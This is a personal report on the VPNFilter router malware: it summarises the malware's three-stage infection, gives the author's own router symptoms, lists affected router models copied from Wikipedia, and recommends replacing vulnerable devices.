A Report on the VPNFilter W.O.R.M.

My Netgear WNDR3700v4 was intermittently losing its capability to transmit and receive data through its 2.4GHz radio band.

According to the FBI and CISCO Talos Group, the malware affects certain routers in stages.

This software installs itself in multiple stages:

1. Stage 1 involves a worm which adds code to the device’s crontab (the list of tasks run at regular intervals by the cron scheduler on Linux). This allows it to remain on the device after a reboot, and to re-infect it with the subsequent stages if they are removed. Stage 1 uses known URLs to find and install Stage 2 malware. If those known URLs are disabled, Stage 1 sets up a socket listener on the device and waits to be contacted by command and control systems.
2. Stage 2 is the body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
3. Stage 3 can be any of various “modules” that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using anonymity network Tor protocol to communicate over encrypted traffic channels.

My issue was that the FBI sank those sites that the WORM relied on, so the signal kept sending requests to download to them with no answer.  This eventually made my network useless on the 2.4GHz radio band.

Normally a router factory reset would get rid of Stage 2 and Stage 3, however, since it initially embeds itself into the firmware on Stage 1, there is no way to fully get rid of it.  From my own experience, the VPNFilter WORM will attach itself to the crontrab (the router’s listen socket on/off schedular) and randomly set a scheduled listening time each time you do a factory reset. 

Below is the Wikipedia article and a list of devicese affected by a vulnerability that allows the VPNFilter WORM to install itself.

https://en.wikipedia.org/wiki/VPNFilter#Devices_at_risk

Asus:

    RT-AC66U

    RT-N10

    RT-N10E

    RT-N10U

    RT-N56U

    RT-N66U

D-Link:

    DES-1210-08P

    DIR-300

    DIR-300A

    DSR-250N

    DSR-500N

    DSR-1000

    DSR-1000N

Huawei:

    HG8245

Linksys:

    E1200

    E2500

    E3000

    E3200

    E4200

    RV082

    WRVS4400N

Mikrotik:

    CCR1009

    CCR1016

    CCR1036

    CCR1072

    CRS109

    CRS112

    CRS125

    RB411

    RB450

    RB750

    RB911

    RB921

    RB941

    RB951

    RB952

    RB960

    RB962

    RB1100

    RB1200

    RB2011

    RB3011

    RB Groove

    RB Omnitik

    STX5

   Mikrotik RouterOS versions up to 6.38.5 on current or 6.37.5 on bug-fix release chains.

Netgear:

    DG834

    DGN1000

    DGN2200

    DGN3500

    FVS318N

    MBRN3000

    R6400

    R7000

    R8000

    WNR1000

    WNR2000

    WNR2200

    WNR4000

    WNDR3700

    WNDR4000

    WNDR4300

    WNDR4300-TN

    UTM50

QNAP:

    TS251

    TS439 Pro

    Other QNAP NAS devices running QTS software

TP-Link

    R600VPN

    TL-WR741ND

    TL-WR841N

Ubiquiti:

    NSM2

    PBE M5

Upvel:

    Unknown Models [nb 1]

ZTE:

    ZXHN H108N

Epidemiology

VPNFilter is described by Cisco Talos as having infected as many as 500,000 devices worldwide, in perhaps 54 different countries, though proportionately the focus has been on Ukraine.

That being said, I strongly urge that people upgrade to a new device, or replace their current router, with one that is not listed above.

]]>